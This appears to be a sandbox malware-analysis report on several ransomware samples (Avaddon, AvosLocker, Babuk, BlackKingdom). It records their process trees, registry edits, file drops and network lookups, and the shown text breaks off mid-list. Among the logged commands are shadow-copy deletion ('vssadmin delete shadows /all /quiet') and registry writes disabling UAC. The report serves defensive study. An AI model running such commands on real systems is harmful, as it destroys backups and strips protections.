PID 3064 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\Wbem\wmic.exe
PID 3064 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe
PID 3064 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe C:\Windows\SysWOW64\vssadmin.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 95.101.129.43:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 184.26.45.61:80 x2.c.lencr.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabEC16.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarECE3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0005f8884a49a763ee00da5e7a16f5db
SHA1 6293b3f20f11ae57677cc856217b02e1585e9f7b
SHA256 bcabd2f23f21dcef112d089b684f405ae75d432908b6916d34745802cce6629e
SHA512 fa8be5bc941da4f3f9e96abe0fb87da71f0e174bd03ba446c03ef403d122a823a8fb48f780df6399f3c08519ba415b1bdbd2ac9ec98ab26cf432d9ba9b7dc1be

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\451311-readme.html

MD5 75b9edf1bf9b43866e75b3311efca520
SHA1 bf557bb3a19175cfcd75e3bf376697dd88f64afd
SHA256 af371ec997b4777fc9f1cabfb3fabb2b94b9c7682d0934fc542686c15b070c22
SHA512 e5df3a7c46dfe17ba613697c1f9247e56767703873f42fa0fb6d11bf660d78c13183c2a03149e6fa42d86f38298b6f3be9ab3e29c31eea42210085db2f50eada

C:\Users\Admin\Documents\RestorePop.xlsx

MD5 8fb256cf5b864425c54c63bf966e6224
SHA1 3082083ac78ddacd81ad84725d64d0b3ab573f35
SHA256 b42d82a0d734d9bb09ee8aca3dc345e7fd7746b2de24a0fd7c57a1b0d90bda68
SHA512 ea40097f6ad7d0bf17435cdb9b1088114a2dcf4f450b3bc4090916a7aabbf93c0b0130018d9de4d20800f2fb428303dd85053e6de63c3e2ec7c4f5370e84ce1f

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1757s

Max time network

1160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Renames multiple (66) files with added filename extension

ransomware

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avos_18_07_2021_403KB.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

C:\Recovery\GET_YOUR_FILES_BACK.txt

MD5 0237b63f764204e00d7242cc4d908271
SHA1 9d88e59463e2a963bea95d6a2cc5383e922f2f27
SHA256 7bee0aff7241590f5bd35727a1a544a492b7533f1acba685611dd269078d1857
SHA512 0daec31046c2704b30760f7aecc944f9591cdf22511e5e9276f3dbc376cc60b04853c3e25abca2e754aeaaaac49c264c7d89d418c832c8275fb5484d51a99b3e

Analysis: behavioral8

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1792s

Max time network

1151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (174) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-587429654-1855694383-2268796072-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

C:\Recovery\WindowsRE\How To Restore Your Files.txt

MD5 81fc4c91a0938482f65a72216cda1e39
SHA1 3fb3d27ceb1502ddf0d68fa9251a6aec46036377
SHA256 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591
SHA512 ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4

Analysis: behavioral10

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1800s

Max time network

1161s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created F:\$RECYCLE.BIN\S-1-5-21-771719357-2485960699-3367710044-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\$Recycle.Bin\S-1-5-21-771719357-2485960699-3367710044-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
